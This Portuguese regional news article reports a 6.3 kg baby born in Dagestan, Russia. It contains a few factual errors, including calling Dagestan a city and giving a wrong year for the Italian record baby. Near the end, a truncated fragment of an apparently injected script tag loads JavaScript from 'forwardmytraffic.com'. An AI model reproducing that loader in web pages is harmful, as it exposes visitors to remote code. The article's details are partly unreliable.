InícioVariedadesNasceu um bebê gigante na Rússia pesando 6,3 quilos

Nasceu um bebê gigante na Rússia pesando 6,3 quilos

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

O bebê nascido na Rússia no último dia de janeiro desse ano vem causando espanto nas pessoas, graças ao seu gigantesco tamanho. Devido ao tamanho, o bebê nasceu com problemas no ouvido e não foi descartado pelos médicos que novos problemas poderão surgir com o passar do tempo.

 

Tudo aconteceu quando uma mulher russa, de 42 anos de idade, deu à luz um bebê que pesava mais de seis quilos. O nascimento da criança causos espantos aos presentes na sala de cirurgia, a ponto de até o médico responsável pelo parto tirar uma foto e fazer uma publicação numa rede social relatando o nascimento do bebê gigante.

 

Esse fato aconteceu na cidade de Daguestán, no sul da Rússia e causou um alvoroço na pequena região.

O bebê é o quinto filho da mulher e veio ao mundo com 6,3 quilos. 

O mais incrível disso tudo é que a mãe teve um parto normal, rejeitando o uso da injeção epidural, evitando o uso de qualquer intervenção cirúrgica. A mãe não quer ter a sua identidade revelada, preferindo manter-se em silencia e no anonimato, justamente pra evitar que repórteres cheguem até a sua casa e tirem o conforto da sua família.

 

De acordo com o jornal espanhol El País, o tamanho do bebê recém-nascido é considerado totalmente fora do normal, o que certamente tem ligação com problemas no ouvido que o bebê nasceu. E novos problemas não estão descartados pelo médico. Pode ser que o bebê venha a desenvolver outros tipos de problemas, mostrando complicações nos dias seguintes ao seu nascimento.

Instagram, Foto do bebê gigante russo
Reprodução/Instagram

Para se ter uma noção de quão desproporcional foi o tamanho do bebê, esse peso está associado a bebês com cerca de seis meses de idade. É como se o bebê ficasse 15 meses na barriga, não apenas os nove normais. 

 

Apesar de ter nascido com toda essa pesagem, este bebê não é o recordista. Foi registrado no livro dos recordes Guiness que em 1995, um bebê teria nascido na Itália, pesando cerca de 10,2 quilos, ficando conhecido pela alcunha de bebê mais pesado do mundo

 

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.